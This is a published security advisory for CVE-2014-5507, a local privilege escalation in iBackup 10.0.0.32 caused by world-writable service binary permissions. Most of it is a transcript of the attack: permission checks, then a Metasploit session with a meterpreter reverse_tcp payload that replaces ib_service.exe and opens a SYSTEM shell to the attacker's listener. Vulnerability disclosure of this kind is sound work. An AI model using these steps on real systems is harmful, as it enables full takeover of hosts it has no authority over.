what you don't know can hurt you

iBackup 10.0.0.32 Local Privilege Escalation

iBackup 10.0.0.32 Local Privilege Escalation
Posted Oct 22, 2014
Authored by Glafkos Charalambous

There are weak permissions for IBackupWindows default installation where everyone is allowed to change the ib_service.exe with an executable of their choice. When the service restarts or the system reboots the attacker payload will execute on the system with SYSTEM privileges. Versions 10.0.0.32 and below are affected.

tags | advisory
advisories | CVE-2014-5507
SHA-256 | 242ccf791d59eefa7b2dae5e7a23750351c763b99ad78523cea13e2cb9d8be66

iBackup 10.0.0.32 Local Privilege Escalation

Change Mirror Download
# Exploit Title: iBackup <= 10.0.0.32 Local Privilege Escalation
# Date: 23/01/2014
# Author: Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>
# Version: 10.0.0.32
# Vendor: IBackup
# Vendor URL: https://www.ibackup.com/
# CVE-2014-5507


Vulnerability Details
There are weak permissions for IBackupWindows default installation where everyone is allowed to change
the ib_service.exe with an executable of their choice. When the service restarts or the system reboots
the attacker payload will execute on the system with SYSTEM privileges.


C:\Users\0x414141>icacls "C:\Program Files\IBackupWindows\ib_service.exe"
C:\Program Files\IBackupWindows\ib_service.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files


C:\Users\0x414141>sc qc IBService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: IBService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\IBackupWindows\ib_service.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : IBackup Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem



msf exploit(service_permissions) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 0x414141-PC\0x414141 @ 0x414141-PC 192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)



msf exploit(service_permissions) > show options

Module options (exploit/windows/local/service_permissions):

Name Current Setting Required Description
---- --------------- -------- -----------
AGGRESSIVE true no Exploit as many services as possible (dangerous)
SESSION 1 yes The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.0.100 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(service_permissions) > exploit

[*] Started reverse handler on 192.168.0.100:4444
[*] Meterpreter stager executable 15872 bytes long being uploaded..
[*] Trying to add a new service...
[*] No privs to create a service...
[*] Trying to find weak permissions in existing services..
[*] IBService has weak file permissions - C:\Program Files\IBackupWindows\ib_service.exe moved to C:\Program Files\IBackupWindows\ib_service.exe.bak and replaced.
[*] Restarting IBService
[*] Could not restart IBService. Wait for a reboot. (or force one yourself)

Upon Reboot or Service Restart

[*] Sending stage (770048 bytes) to 192.168.0.102
[*] Meterpreter session 2 opened (192.168.0.100:4444 -> 192.168.0.102:14852) at 2014-07-21 00:52:36 +0300
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 2...

msf exploit(service_permissions) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 0x414141-PC\0x414141 @ 0x414141-PC 192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ 0x414141-PC 192.168.0.100:4444 -> 192.168.0.102:14852 (192.168.0.102)


Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close